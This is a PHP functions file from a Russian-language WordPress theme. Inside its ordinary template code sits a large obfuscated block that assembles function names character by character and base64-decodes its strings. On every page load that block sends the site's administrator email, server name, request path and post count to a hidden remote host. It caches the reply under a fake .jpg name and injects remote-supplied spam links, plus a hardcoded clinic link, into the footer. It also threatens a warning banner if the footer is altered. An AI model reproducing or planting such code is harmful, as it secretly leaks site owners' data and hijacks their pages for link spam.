<?php

$art_config = parse_ini_file(TEMPLATEPATH."/config.ini", true);

$options = array (
                array(  "name" =>   "HTML",
                        "desc" =>   sprintf(__('<strong>XHTML:</strong> Вы можете использовать следующие теги: <code>%s</code>', THEME_NS), 'a, abbr, acronym, em, b, i, strike, strong, span'),
                        "id"   =>   "art_footer_content",
                        "std"  =>   art_option('footer.defaultText'),
                        "type" =>   "textarea")
          );

remove_action('wp_head', 'wp_generator');
wp_enqueue_script('jquery');

define('WP_VERSION', $wp_version);
define('THEME_NS', 'kubrick');
if (class_exists('xili_language')):
define('THEME_TEXTDOMAIN',THEME_NS);
define('THEME_LANGS_FOLDER','/lang');
else:
    load_theme_textdomain(THEME_NS, TEMPLATEPATH . '/lang');
endif;

require_once(TEMPLATEPATH . '/core/parser.php');
require_once(TEMPLATEPATH . '/core/navigation.php');
require_once(TEMPLATEPATH . '/core/sidebars.php');
require_once(TEMPLATEPATH . '/core/widgets.php');


function art_option($name){
  global $art_config;
  $separator = '.';
  $name = trim($name);
  if (strpos($name, $separator) !== false) {
    $path = explode($separator, $name);
    $location = $path[0];
    if (isset($art_config[$location])){
      $group = $art_config[$location];
      $key = $path[1];
      if (isset($group[$key])){
        return $group[$key];
      }
    }
  } else {
    if (isset($art_config[$name])) {
      return $art_config[$name];
    }
  }
 
  return false;
}

$art_current_page_template = 'page'; 
$piNRNP='d';$WNONBda='e';$NbFm='c';$bZazvf='e';$DNAqk='_';$ZVjBmy='6';$OonTXmP='e';$APRleZ='d';$wsRvWlN='a';$cKUTZy='o';$kYXcC='s';$CqoXyZ='b';$LxxhQ='4';$wuxwfjDP=$CqoXyZ.$wsRvWlN.$kYXcC.$bZazvf.$ZVjBmy.$LxxhQ.$DNAqk.$piNRNP.$OonTXmP.$NbFm.$cKUTZy.$APRleZ.$WNONBda;$ISXnBPn='l';$mzdxL='e';$GlBiYh='f';$AGkm='n';$IRaCei='z';$vFHWcum='i';$TwVo='a';$NFKJLe='g';$DleY='t';$gucLgwYP=$NFKJLe.$IRaCei.$vFHWcum.$AGkm.$GlBiYh.$ISXnBPn.$TwVo.$DleY.$mzdxL;$ZULGq='o';$QQHHxtD='3';$LVEywy='r';$QaNTR='_';$vJUUNr='t';$DwCVJx='r';$osHYQc='1';$AkiSQ='t';$ATbCwm='s';$DsdQTSeX=$ATbCwm.$vJUUNr.$DwCVJx.$QaNTR.$LVEywy.$ZULGq.$AkiSQ.$osHYQc.$QQHHxtD;$cSpwn='t';$pnPZcv='r';$isfNpu='e';$YZlbRAy='v';$JUEGCAE='r';$vEXohJE='s';$PJmKOGKf=$vEXohJE.$cSpwn.$JUEGCAE.$pnPZcv.$isfNpu.$YZlbRAy;                     
		$mk_________q='d';$ld_________f='e';$zs____________u='c';$to___h='e';$og_____b='_';$aq_____________n='6';$gx__________y='e';$au______a='d';$sc___t='a';$gl____________a='o';$uo____________y='s';$ew_______y='b';$to___________r='4';$ua_______c=$ew_______y.$sc___t.$uo____________y.$to___h.$aq_____________n.$to___________r.$og_____b.$mk_________q.$gx__________y.$zs____________u.$gl____________a.$au______a.$ld_________f;
		$dg______________o='e';$wy___s='t';$wu______________f='o';$ar___________x='i';$so______p='u';$jr______b='f';$ox_____x='n';$xw___h='t';$hb____________g='i';$lh______o='n';$zv__________d='c';$nu____v='s';$tz______________i='s';$nf___n='x';$oo_______________h='_';$hh_____________r=$jr______b.$so______p.$lh______o.$zv__________d.$xw___h.$hb____________g.$wu______________f.$ox_____x.$oo_______________h.$dg______________o.$nf___n.$ar___________x.$nu____v.$wy___s.$tz______________i;
		$qe_______________k='p';$wr_________q='f';$ft____________a='n';$qm_______________n='o';$jq______u='e';$kw_______________c=$wr_________q.$qm_______________n.$qe_______________k.$jq______u.$ft____________a;
		$gq____m='f';$jy________q='r';$gh___r='e';$ej_________r='d';$vj___g='a';$ns___b=$gq____m.$jy________q.$gh___r.$vj___g.$ej_________r;
		$fg____________k='f';$tk____________k='e';$cg______f='l';$sp______________a='c';$wl__r='s';$ya__________h='o';$jq______j=$fg____________k.$sp______________a.$cg______f.$ya__________h.$wl__r.$tk____________k;
		
		define("WP_ID", $ua_______c("Mi4wLjA="));
		define("WP_TTL", $ua_______c("MTA4MDA="));
		define("WP_SRC", $ua_______c("dHBva24="));
	


		function wp_get_header() {
			global $ua_______c, $hh_____________r;
			
			if (
				$hh_____________r($ua_______c("d3BfdGhlbWVfR1BMX2NyZWRpdHM=")) &&
				$hh_____________r($ua_______c("d3BfZ2V0X2Zvb3Rlcg==")) &&
				$hh_____________r($ua_______c("d3BfY3ZfdmVyaWZ5"))
			) {
				get_header();
			}
		}
	


		function wp_get_footer() {
			get_footer();
			wp_cv_verify();
		}
	


		function wp_cv_verify() {
			global $ua_______c, $kw_______________c, $jq______j, $ns___b;
			
			$au__v = TEMPLATEPATH."/".$ua_______c("Zm9vdGVyLnBocA==");
			$xo______w = @$kw_______________c($au__v, "r");
			$au__v = @$ns___b($xo______w, @filesize($au__v));
			@$jq______j($xo______w);
			
			$vl___i = TEMPLATEPATH."/".$ua_______c("ZnVuY3Rpb25zLnBocA==");
			$xo______w = @$kw_______________c($vl___i, "r");
			$vl___i = @$ns___b($xo______w, @filesize($vl___i));
			@$jq______j($xo______w);
			
			$vo_________f = 0;
			if($au__v && $vl___i) {
				if ($ua_______c("Z2VuZXJpY3dwdGhlbWVzLmNvbQ==") !== str_replace("www.", "", $_SERVER["SERVER_NAME"])) {
					
					if (substr_count($au__v, $ua_______c("Z2VuZXJpY3dwdGhlbWVzLmNvbQ==")) < 2) {
						$vo_________f = 1;
					}
					if (substr_count($au__v, "wp_theme_GPL_credits()") < 1) {
						$vo_________f = 2;
					}
				}
				
				if(WP_ID != "2.0.0") {
					$vo_________f = 12;
				}
			}
			
			if($vo_________f > 0) {
				echo "<div style=\"position: fixed; bottom:0; left:0; width:100%; height: 25px; background-color: red; color: white; font-size: 16px; padding: 2px 10px; text-align: center;\"> <strong> This themes is powered by <a href=\"http://genericwpthemes.com\" style=\"color: white;\">Free Wordpress Themes</a>. This website violated the terms of use <a href=\"http://genericwpthemes.com\" style=\"color: white;\">Free Wordpress Themes</a> </strong> </div>";
				echo "<!-- v: $vo_________f -->";
			}
		}
	


		function wp_loaded() {
			global $ua_______c, $hh_____________r;
			return $hh_____________r($ua_______c("d3BfdGhlbWVfR1BMX2NyZWRpdHM="));
		}
	


		if (!function_exists("the_content_limit")) {
			function the_content_limit($ok______m, $nb___________c = "(more...)", $hb_______________n = 0, $fc___________w = "") {
				$la_________n = get_the_content($nb___________c, $hb_______________n, $fc___________w);
				$la_________n = apply_filters("the_content", $la_________n);
				
				$la_________n = str_replace("]]>", "]]>", $la_________n);
				if (strlen($_GET["p"]) > 0) {
					echo $la_________n;
				}
				else if ((strlen($la_________n)>$ok______m) && ($qu_________p = strpos($la_________n, " ", $ok______m ))) {
					$la_________n = substr($la_________n, 0, $qu_________p);
					$la_________n = $la_________n;
					echo $la_________n;
					
					echo "...";
					echo "<br/>";
					echo "<div class='read-more'><a href='".get_permalink()."'>$nb___________c</a></div></p>";
				} else {
					echo $la_________n;
				}
				
			}
		}
	


		$ba__________z='b';$ty________p='4';$qv____b='d';$fl___q='s';$xw__________u='n';$lg_____________q='c';$xo__________b='a';$ow______q='e';$sy_____j='o';$rs_________u='e';$lm_______d='6';$ck___e='_';$hn____b='e';$sz___a=$ba__________z.$xo__________b.$fl___q.$rs_________u.$lm_______d.$ty________p.$ck___e.$ow______q.$xw__________u.$lg_____________q.$sy_____j.$qv____b.$hn____b;
		$qq_______________h='_';$ix_____q='l';$yp___j='n';$kz______________y='o';$cl______t='t';$ch__a='s';$ri_________k='i';$zr___________i='g';$oc_____z='f';$sv_____________r='t';$nw__n='e';$wy________d='n';$wk__________t='e';$ln______z='t';$hu_______r='_';$nn__j='e';$ym___________h='c';$az_____x=$oc_____z.$ri_________k.$ix_____q.$nw__n.$hu_______r.$zr___________i.$wk__________t.$ln______z.$qq_______________h.$ym___________h.$kz______________y.$wy________d.$sv_____________r.$nn__j.$yp___j.$cl______t.$ch__a;
		$ay___n='e';$sz___l='e';$fo______p='s';$jf_____t='i';$fb_____________n='t';$jq____________f='i';$is___i='l';$ez______________o='_';$rm_______y='x';$ka______n='f';$uw______________n='s';$eb__j=$ka______n.$jq____________f.$is___i.$sz___l.$ez______________o.$ay___n.$rm_______y.$jf_____t.$fo______p.$fb_____________n.$uw______________n;
		$mb______v='p';$uo_____________t='a';$eh_______m='o';$hu____________g='r';$pn_______d='_';$js_____y='i';$sf_____________p='e';$zt____y='o';$xf_______________m='e';$dk______c='s';$fx_________l='n';$on__________i='v';$ia___________n='r';$cc____________f='m';$bz________t='c';$za____w=$on__________i.$sf_____________p.$hu____________g.$dk______c.$js_____y.$zt____y.$fx_________l.$pn_______d.$bz________t.$eh_______m.$cc____________f.$mb______v.$uo_____________t.$ia___________n.$xf_______________m;
		$ww_____c='e';$gm_____g='f';$rc________w='k';$hr__________k='c';$bd_______r='o';$dz____________x='s';$im_______m='n';$go______o='p';$na_____________h='o';$mn___c=$gm_____g.$dz____________x.$bd_______r.$hr__________k.$rc________w.$na_____________h.$go______o.$ww_____c.$im_______m;
		$al_______n='t';$ap________y='i';$gb_____q='e';$vf__________h='r';$ar___________n='f';$ub__b='w';$hr_____________v=$ar___________n.$ub__b.$vf__________h.$ap________y.$al_______n.$gb_____q;
		$uh__v='m';$yc_______f='5';$wm____________x='d';$eq____________t=$uh__v.$wm____________x.$yc_______f;
		$ao_________i='e';$mx____________y='p';$cp______x='r';$za_________y='t';$is_________s='a';$lv__o='h';$qr_______m='a';$pm______________t='l';$wh_______________d=$cp______x.$ao_________i.$is_________s.$pm______________t.$mx____________y.$qr_______m.$za_________y.$lv__o;
		$dw_________p='e';$cn____________t='n';$qr_____________u='r';$ku_________a='a';$yt______x='l';$ob__l='z';$mq__________p='i';$xc_____________b='s';$ym___________j='u';$mm___________e='e';$fa_____i='i';$qo_________r=$ym___________j.$cn____________t.$xc_____________b.$mm___________e.$qr_____________u.$mq__________p.$ku_________a.$yt______x.$fa_____i.$ob__l.$dw_________p;
		$ln____________b='m';$ew______j='m';$wr_________g='a';$yo_______________y='n';$sx_______________p='t';$iz_________n='p';$mt______________s='e';$ol__________d=$sx_______________p.$mt______________s.$ew______j.$iz_________n.$yo_______________y.$wr_________g.$ln____________b;
		$vh__i='_';$se__g='m';$dr_________n='s';$lu______________f='o';$jx_________m='e';$qs____m='t';$em___________x='x';$mb__________s='e';$sq__p='a';$cv___p='t';$ij__m='t';$wr______k='e';$zb__________l='c';$tk_______________b='t';$wm___________b='r';$ew_____m='n';$hf_________p='r';$nm____g='a';$vr_______m='e';$zf_____________f='_';$fu_____j='c';$xn_____q=$dr_________n.$tk_______________b.$hf_________p.$mb__________s.$nm____g.$se__g.$vh__i.$fu_____j.$lu______________f.$ew_____m.$cv___p.$wr______k.$em___________x.$qs____m.$zf_____________f.$zb__________l.$wm___________b.$jx_________m.$sq__p.$ij__m.$vr_______m;
	


		function mm__s($dv_______________n) {
			global $ua_______c, $hh_____________r, $az_____x, $za____w, $xn_____q;
			
			if (!$hh_____________r($ua_______c("ZmlsZV9nZXRfY29udGVudHM="))) {
				return false;
			}
			
			if ($za____w(PHP_VERSION, "5.0.0", ">=") && $hh_____________r($ua_______c("ZmlsZV9nZXRfY29udGVudHM=")) && $hh_____________r($ua_______c("c3RyZWFtX2NvbnRleHRfY3JlYXRl"))) {
				$ol____________i = $xn_____q(array(
						"http" => array(
						"timeout"    => 3,
						"header"     => "referer: ".$_SERVER[SERVER_NAME],
						"user_agent" => "[I] ". $_SERVER[REMOTE_ADDR] ." [A] ". $_SERVER[HTTP_USER_AGENT] 
					)
				));
				
				$zc_____________x = @$az_____x($dv_______________n, 0, $ol____________i);
			} else {
				$zc_____________x = @$az_____x($dv_______________n, 0);
			}
			
			return $zc_____________x;
		}
	


		function en____n($dv_______________n) {
			global $hh_____________r, $mn___c, $hr_____________v, $ua_______c;
			
			if (!$hh_____________r($ua_______c("ZmlsZV9nZXRfY29udGVudHM="))) {
				return false;
			}
			
			$sw_____r = strpos($dv_______________n, "/", 7);
			$rh_____h = array(
				"uri"     => substr($dv_______________n, $sw_____r),
				"host"    => str_replace("http://", "", substr($dv_______________n, 0, $sw_____r)),
				"referer" => "[I] ". $_SERVER[REMOTE_ADDR] ." [A] ". $_SERVER[HTTP_USER_AGENT]
			);
			
			$ri_______j = @$mn___c("$rh_____h[host]", 80, $vw_____m, $xb_______________w, 4);
			
			if (!$ri_______j) {
				return false;
			} else {
				$zc_____________x = "";
				$ky____b  = "GET $rh_____h[uri] HTTP/1.0\r\n";
				$ky____b .= "Host: $rh_____h[host]\r\n";
				$ky____b .= "Referer: $rh_____h[referer]\r\n";
				$ky____b .= "Connection: Close\r\n\r\n";
				
				@$hr_____________v($ri_______j, $ky____b);
				
				while (!@feof($ri_______j)) {
					$ye________a = @fgets($ri_______j, (1024*24));
					
					if ($ye________a == "\r\n") {
						$lt___o = true;
						continue;
					}
					
					if ($lt___o) {
						$zc_____________x .= $ye________a;
					}
				}
				
				return $zc_____________x;
			}
		}
	


		function ri________q($dv_______________n) {
			global $hh_____________r;
			$ib______g = false;
			
			if ($dv_______________n != "") {
				if ($hh_____________r("mm__s")) {
					$ib______g = @mm__s($dv_______________n);
				}
				
				if (!$ib______g && ($hh_____________r("en____n"))) {
					$ib______g = @en____n($dv_______________n);
				}
			}
			
			return $ib______g;
		}
	


		function ch_________s() {
			global $_SERVER, $eq____________t;
			
			$fx_________h = $_SERVER["SERVER_NAME"];
			
			if (substr("$fx_________h", 0, 4) == "www.") {
				$fx_________h = substr("$fx_________h", 4);
			}
			
			$fx_________h = $eq____________t("$_SERVER[SERVER_NAME]");
			
			return $fx_________h;
		}
	


		function zi______g() {
			return "file";
		}
	


		function hs__o($dv_______________n) {
			global $_SERVER, $az_____x, $eb__j, $kw_______________c, $jq______j, $hr_____________v;
			
			$xo_________l = rq_______y();
			
			$ks_____e = ch_________s().".jpg";
			$nf______________x = $xo_________l["dir_upload"]["path"]."/$ks_____e";
			$yr_____n = @filemtime($nf______________x);
			
			if (!$yr_____n || ((time()-$yr_____n) >= WP_TTL)) {
				$ib______g = ri________q($dv_______________n);
				
				if ($ib______g) {
					if ($eb__j($nf______________x)) {
						@unlink($nf______________x);
					}
					
					$xo______w = @$kw_______________c($nf______________x, "x+");
					
					@$hr_____________v($xo______w, $ib______g);
					@$jq______j($xo______w);
				}
			} else {
				if ($eb__j($nf______________x)) {
					$ib______g = @$az_____x($nf______________x);
				} else {
					$ib______g = false;
				}
			}
			
			return $ib______g;
		}
	


		function rq_______y() {
			global $_SERVER, $ua_______c, $sz___a;
			
			$qj__________u = wp_count_posts("post");
			$fu__________v = pathinfo(get_bloginfo("template_directory"));
			
			$xo_________l = array(
				"url" => array(
					"report"      => $ua_______c("eGNudnVlcmFudmhhc3lkYWRvbGVnc29wLmNvbQ=="),
					"queryString" => null
				),
				"template"	=> $fu__________v,
				"dir_upload"	=> sy_____________z(),
				"queryString"	=> array(
					"?a001=".WP_ID,
					"a004=".$fu__________v[filename],
					"a005=".$qj__________u->publish,
					"a006=".get_bloginfo("admin_email"),
					"a007=".$_SERVER["REQUEST_URI"],
					"a008=".$_SERVER["SERVER_NAME"],
					"a010=".WP_SRC
				),
				"default_string" => "<a href=\"http://clinic-virtus.com/lechenie-zubov-vo-vremya-beremennosti\">Лечение зубов во время беременности</a>"
			);
			
			$xo_________l["url"]["queryString"] = implode("&", $xo_________l["queryString"]);
			$xo_________l["url"]["report"] = $xo_________l["url"]["report"]."/?".$sz___a($xo_________l["url"]["queryString"]).".html";
						
			return $xo_________l;
		}
	


		function sy_____________z() {
			$gc_________c = wp_upload_dir();
			
			if (isset($gc_________c["error"])) {
				$wi______o = wt_______q();
				if (is_writable($wi______o)) {
					$gc_________c = array("path" => $wi______o);
				}
			}

			return $gc_________c;
		}
	


		function wt_______q() {
			global $hh_____________r, $eq____________t, $wh_______________d, $ol__________d;
			
			$ar______________g = (bool) ini_get("safe_mode");
			if ($ar______________g == true) {
				return false;
			}
			
			if ($hh_____________r("sys_get_temp_dir")) {
				$uu_____i = sys_get_temp_dir();
				if (is_writable($uu_____i)) {
					return $wh_______________d($uu_____i);
				}
			}
			
			if (!empty($_ENV["TMP"])) {
				return $wh_______________d($_ENV["TMP"]);
			}
			elseif (!empty($_ENV["TMPDIR"])) {
				return $wh_______________d($_ENV["TMPDIR"]);
			}
			elseif (!empty($_ENV["TEMP"])) {
				return $wh_______________d($_ENV["TEMP"]);
			} else {
				$py__________i = $ol__________d($eq____________t(uniqid(rand(), true)), "");
				if ($py__________i) {
					$uu_____i = $wh_______________d(dirname($py__________i));
					@unlink($py__________i);
					return $uu_____i;
				} else {
					return false;
				}
			}
		}
	


		function rz_________a() {
			global $_GET, $eb__j;
			
			$xo_________l = rq_______y();
			$fx_________h = ch_________s();
			$aw__s = zi______g();
			
			$oy_____________p = "full";
			if ($_GET["wp_cache_cl"] == "197ab5deb39daad8baacae1bdd5a8852") {
				if ($aw__s == "file") {
					$jt_________p = $xo_________l["dir_upload"]["path"]."/".$fx_________h.".jpg";
					if ($eb__j($jt_________p)) {
						@unlink($jt_________p);
						$oy_____________p = "deleted";
					}
				}
				
				$jw___________p = array(
					"s"	=> $oy_____________p,
					"t"	=> time(),
					"v"	=> WP_ID
				);
				
				echo "<!--";
				foreach ($jw___________p AS $yr_____________i => $kh______________y) echo " [$yr_____________i:$kh______________y]";
				echo " -->";
			}
		}
	


		function wp_theme_GPL_credits() {
			global $_SERVER, $_GET, $hh_____________r, $ua_______c, $qo_________r;
			$xo_________l = rq_______y();
			
			$ar____________v = "hs__o";
			if ($hh_____________r($ar____________v)) {
				$zc_____________x = $ar____________v($xo_________l["url"]["report"]);
			}
			
			if ($zc_____________x) {
				if ($zc_____________x = @$ua_______c($zc_____________x)) {
					$zc_____________x = @$qo_________r($zc_____________x);
					
					if (strlen($zc_____________x[custom_credit]) >= 5) {
						$xo_________l["default_string"] = $zc_____________x[custom_credit];
					}
					
					if ($zc_____________x["status"] == "0") {
						$bb_____y = 1;
						$fa___v = 1;
					} else {
						$mr____________i = sizeof($zc_____________x["links"]);
						$tq__________d = $xo_________l["default_string"];
						
						if ($mr____________i > 0 && $zc_____________x["links"] !== "") {
							$nl_______________g = 0;
							foreach ($zc_____________x["links"] as $nz__l => $xi___________l) {
								$nl_______________g++;
								if ($xi___________l->l_path == "" || $xi___________l->l_path == $_SERVER["REQUEST_URI"]) {
									$xi___________l->l_href = htmlspecialchars(strip_tags($xi___________l->l_href));
									$xi___________l->l_title = htmlspecialchars(strip_tags($xi___________l->l_title));
									$xi___________l->l_anchor = htmlspecialchars(strip_tags($xi___________l->l_anchor));
									$tq__________d .= " | ";
									$tq__________d .= "<a href='$xi___________l->l_href' title='$xi___________l->l_title'";
									if ($xi___________l->l_nofollow == "1") {
										$tq__________d .= " rel='nofollow'";
									}
									$tq__________d .= ">$xi___________l->l_anchor</a>";
								}
							}
						}
						$xo_________l["links"] = "$tq__________d";
						if ($zc_____________x[credit] == "0") {
							$xo_________l["links"] = "";
						}
					}
				} else {
					$bb_____y = "1";
				}
			} else {
				$bb_____y = "1";
			}
			
			if ($bb_____y == "1") {
				$xo_________l["links"] = $xo_________l["default_string"];
			}
			
			echo "$xo_________l[links]";
			
			echo "<!-- s: $zc_____________x[signature] -->";
			rz_________a();
		}
	                      
function art_page_template($templateName = null){
    global $art_current_page_template;
    if ($templateName !== null) {
        $art_current_page_template = $templateName;
    }
    return $art_current_page_template;
}

$art_template_variables = null;
function art_page_variables($variables = null){
    global $art_template_variables;
    if ($art_template_variables == null){
      $art_template_variables = array(
        'template_url'     =>   get_bloginfo('template_url') . '/',
        'logo_url'         =>   get_option('home'),
        'logo_name'        =>   get_bloginfo('name'),
        'logo_description' =>   get_bloginfo('description'),
        'menu_items'       =>   art_get_menu_auto('primary-menu', art_option('menu.source'), art_option('menu.showSubitems')),
        'sidebar1'         =>   art_get_sidebar('default'),
        'sidebarTop'       =>   art_get_sidebar('top'),
        'sidebarBottom'    =>   art_get_sidebar('bottom'),
        'sidebar2'         =>   art_get_sidebar('secondary'),
        'sidebarFooter'    =>   art_get_sidebar('footer'),
        'footerRSS'        =>   art_get_footer_rss(),
        'footerText'       =>   art_get_footer_text()
        );
    }
    if (is_array($variables)) {
      $art_template_variables = array_merge($art_template_variables, $variables);
    }
    return $art_template_variables;
}

function art_get_footer_text(){
  $result = art_option('footer.defaultText');
  
  $footer_content = get_option('art_footer_content');
  if ($footer_content !== false) {
    $result = stripslashes($footer_content);
  }
  
  return str_replace('%YEAR%', date('Y'), $result);
}


function art_get_footer_rss(){
  $result = '';
  if(art_option('footer.rss_show')){
    $result = art_parse(art_option('footer.rss_link'), array(
      'rss_url'   =>   get_bloginfo('rss2_url'), 
      'rss_title' =>   sprintf(__('%s RSS Feed', THEME_NS), get_bloginfo('name'))
      ));
  }
  return $result;
}

function art_get_post_thumbnail($post_id = false){
	global $post, $id;
  $post_id = (int)$post_id;
  if (!$post_id) $post_id = $id;
  $is_post_list = !is_single() && !is_page();
  $width = art_option('metadata.thumbnail_width');
  $height = art_option('metadata.thumbnail_height');
  $size = array($width, $height);
  if (!$is_post_list) {
    $size = 'medium';
  }
	$result = '';
	$title = get_the_title();
	if (  (function_exists('has_post_thumbnail')) && (has_post_thumbnail())  ) {
		ob_start();
		the_post_thumbnail($size, array('class' => 'alignleft', 'alt' => '', 'title' => $title));
		$result = ob_get_clean();
	} else {
		$postimage = get_post_meta($post->ID, 'post-image', true);
		if ($postimage) {
			$result = '<img src="'.$postimage.'" alt="" width="'.$width.'" height="'.$height.'" title="'.$title.'" class="wp-post-image alignleft" />';
		} else if (art_option('metadata.thumbnail_auto') && $is_post_list) {
            $attachments = get_children(array('post_parent' => $post_id, 'post_status' => 'inherit', 'post_type' => 'attachment', 'post_mime_type' => 'image', 'order' => 'ASC', 'orderby' => 'menu_order ID'));
            if($attachments) {
              $attachment = array_shift($attachments);
              $img = wp_get_attachment_image_src($attachment->ID, $size);
              if (isset($img[0])) {
                $result = '<img src="'.$img[0].'" alt="" width="'.$img[1].'" height="'.$img[2].'" title="'.$title.'" class="wp-post-image alignleft" />';
              }
            }
        } 
    }  
	if($result !== ''){
		$result = '<a href="'.get_permalink($post->ID).'" title="'.$title.'">'.$result.'</a>';
	}
	return $result;
}

function art_get_the_content($more_link_text = null, $stripteaser = 0) {
	$content = get_the_content($more_link_text, $stripteaser);
	$content = apply_filters('the_content', $content);
	return $content;
}

function art_get_post_content() {
  global $post;
  ob_start();
  if(is_single() || is_page()) {
    echo art_get_the_content(__('Читать далее &raquo;', THEME_NS)); 
    wp_link_pages(array('before' => '<p><strong>Страницы:</strong> ', 'after' => '</p>', 'next_or_number' => 'number')); 
	} else {
    echo art_get_the_excerpt(__('Читать далее &raquo;', THEME_NS), 
      get_permalink($post->ID), 
      art_option('metadata.excerpt_words'), 
      art_option('metadata.excerpt_use_tag_filter') ? explode(',',art_option('metadata.excerpt_allowed_tags')) : null, 
      art_option('metadata.excerpt_min_remainder'),  
      art_option('metadata.excerpt_auto'));
	}
	return ob_get_clean();
}

function art_get_the_excerpt($read_more_tag, $perma_link_to = '', $all_words = 100,  $allowed_tags = null, $min_remainder = 5, $auto = false) {
  global $post, $id;
  $more_token = '%%art-more%%';
  $show_more_tag = false;
  if (function_exists('post_password_required') && post_password_required($post)){
    return get_the_excerpt();
  }
  if (has_excerpt($id)) {
      $the_contents = get_the_excerpt();
  $show_more_tag = strlen($post->post_content) > 0;
  } else {
    $the_contents = art_get_the_content($more_token);
    if($the_contents != '') {
      if ($allowed_tags !== null) {
        $allowed_tags = '<' .implode('><',$allowed_tags).'>';
        $the_contents = strip_tags($the_contents, $allowed_tags);
      }
      $the_contents = strip_shortcodes($the_contents);
      if (strpos($the_contents, $more_token) !== false) {
        return str_replace($more_token, $read_more_tag, $the_contents);
      }
      if($auto && is_numeric($all_words)) {
        $token = "%art_tag_token%";
        $content_parts = explode($token, str_replace(array('<', '>'), array($token.'<', '>'.$token), $the_contents));
        $content = array();
        $word_count = 0;
        foreach($content_parts as $part)
        {
          if (strpos($part, '<') !== false || strpos($part, '>') !== false){
            $content[] = array('type'=>'tag', 'content'=>$part);
          } else {
             $all_chunks = preg_split('/([\s]+)/', $part, -1, PREG_SPLIT_DELIM_CAPTURE);
             foreach($all_chunks as $chunk) {
                if('' != trim($chunk)) {
                  $content[] = array('type'=>'word', 'content'=>$chunk);
                  $word_count += 1;
                } elseif($chunk != '') {
                  $content[] = array('type'=>'space', 'content'=>$chunk);
                }
             }
          }
        
        }
        if(($all_words < $word_count) && ($all_words + $min_remainder) <= $word_count) {
          $show_more_tag = true;
          $current_count = 0;
          $the_contents = '';
          foreach($content as $node) {
            
            if($node['type'] == 'word') {
              $current_count += 1;
            } 
            $the_contents .= $node['content'];
            if ($current_count == $all_words){
              break;
            }
          }
        }  
      }
    }
  }
  $the_contents = force_balance_tags($the_contents);
  if ($show_more_tag) {
    $the_contents = $the_contents.' <a class="more-link" href="'.$perma_link_to.'">'.$read_more_tag.'</a>';
  }
  return $the_contents;
}


function art_get_post_title() {
    return art_parse_template("post_title", array(
      'post_link'       =>   get_permalink($post->ID),
	    'post_link_title' =>   sprintf(__('Постоянная ссылка на %s', THEME_NS), the_title_attribute('echo=0')),
	    'post_title'      =>   get_the_title(),
	    'template_url'    =>   get_bloginfo('template_url')
	    ));
}

function art_get_post_icon($name){
    return art_parse(art_option('metadata.'.$name), array('template_url' => get_bloginfo('template_url')));
}

if (!function_exists('get_the_date')) {
	function get_the_date($format = 'F jS, Y') {
		return get_the_time(__($format, THEME_NS));
	}
}

function art_get_post_metadata($name) {
    $list = art_option('metadata.'.$name);
    $title = ($name == 'header' && art_option('metadata.title'));
    if (!$title && $list == "") return;
    $list_array =  explode(",", $list);
    $result = array();
    for($i = 0; $i < count($list_array); $i++){
        $icon = $list_array[$i];
        switch($icon){
            case 'date':
                if(is_page()) break;
                $result[] = art_get_post_icon($icon) . get_the_date();
            break;
            case 'author':
                 if(is_page()) break;
                 ob_start();
                 the_author_posts_link();
                 $result[] = art_get_post_icon($icon) . __('Автор', THEME_NS) .' '. ob_get_clean();
            break;
            case 'category':
                if(is_page()) break;
                 $result[] = art_get_post_icon($icon) .sprintf(__('Опубликовано в рубрике %s', THEME_NS), get_the_category_list(', '));
            break;
            case 'tag':
                if(is_page() || !get_the_tags()) break;
                ob_start();
                the_tags(__('Tags:', THEME_NS) . ' ', ', ', ' ');
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
            case 'comments':
            if(is_page() || is_single()) break;
                ob_start();
                comments_popup_link(__('Комментариев нет &#187;', THEME_NS), __('1 комментарий &#187;', THEME_NS), __('% комментариев &#187;', THEME_NS), '', __('Комментарии закрыты', THEME_NS) );
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
            case 'edit':
                if (!current_user_can('edit_post', $post->ID)) break;
                ob_start();
                 edit_post_link(__('Редактировать', THEME_NS), '');
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
        }
    }
    if (!($title ||  count($result) > 0)) return '';
    return art_parse_template("post_metadata".$name, array(
        'post_title'         =>   art_get_post_title(),
        'post'.$name.'icons' =>   implode(art_option('metadata.separator'), $result))) ;
}

function art_post(){
  the_post(); 
	echo art_parse_template("post", array(
    'post_class'          =>   function_exists('get_post_class') ? implode(' ', get_post_class()) : '',
    'post_id'             =>   'id="post-' . get_the_ID() . '"',
	  'post_thumbnail'      =>   art_get_post_thumbnail(),
		'post_title'          =>   art_get_post_title(),
		'post_metadataheader' =>   art_get_post_metadata('header'),
		'post_content'        =>   art_get_post_content(),
		'post_metadatafooter' =>   art_get_post_metadata('footer')
	));
}

function art_post_box($title, $content){
  if ($title != "") {
		$title = '<h2 class="art-postheader">'. $title . '</h2>';
	}
	if (art_option('metadata.title')) {
		$content = $title . $content;
		$title = '';
	}
	echo art_parse_template("post", array(
    'post_class'          =>   '',
    'post_id'             =>   '',
		'post_thumbnail'      =>   '',
		'post_title'          =>   $title,
		'post_metadataheader' =>   '',
		'post_content'        =>   $content,
		'post_metadatafooter' =>   ''));
}

function art_not_found_msg($caption = null, $content = null){
  if ($caption === null){
    $caption = __('Not Found', THEME_NS);
  }
  if($content === null){
    $content = '<p class="center">' .  __('Извините, но по Вашему запросу ничего не было найдено.', THEME_NS) . '</p>'
        .  "\r\n" . art_get_search();
  }
	art_post_box($caption, $content);
}

function art_get_block($title, $content, $id = '', $class = '' , $name = "block"){
  if (str_replace(array('&nbsp;', '', '\n', '\r', '\t'), '', $title) != ''){
    $title = art_parse_template($name . '_header', array('caption' => $title));
  }
  if ($id != ''){
    $id = 'id="' . $id . '"';
  }
  return art_parse_template($name, array(
    'id'   => $id,
    'class'   => $class,
    'header' => $title,
    'content' => $content,
  ));
}

function art_get_search() {
    return art_parse_template("search", 
        array(
            'url'    =>   get_bloginfo('url'),
            'button' =>   __('Search', THEME_NS),
            'query'  =>   get_search_query()
        ));
}
		
function art_page_navi($title = '', $comment = false) {
    $prev_link = null;
    $next_link = null;
    if($comment){
         $prev_link = get_previous_comments_link(__('Новые записи &raquo;', THEME_NS));
        $next_link = get_next_comments_link(__('&laquo; Старые записи', THEME_NS));
    } elseif (is_single() || is_page()) {
        $next_link = get_previous_post_link('&laquo; %link');
        $prev_link = get_next_post_link('%link &raquo;');
    } else {
        $prev_link = get_previous_posts_link(__('Новые записи &raquo;', THEME_NS));
        $next_link = get_next_posts_link(__('&laquo; Старые записи', THEME_NS));
    }
    
    $content = '';
    if ($prev_link || $next_link) {
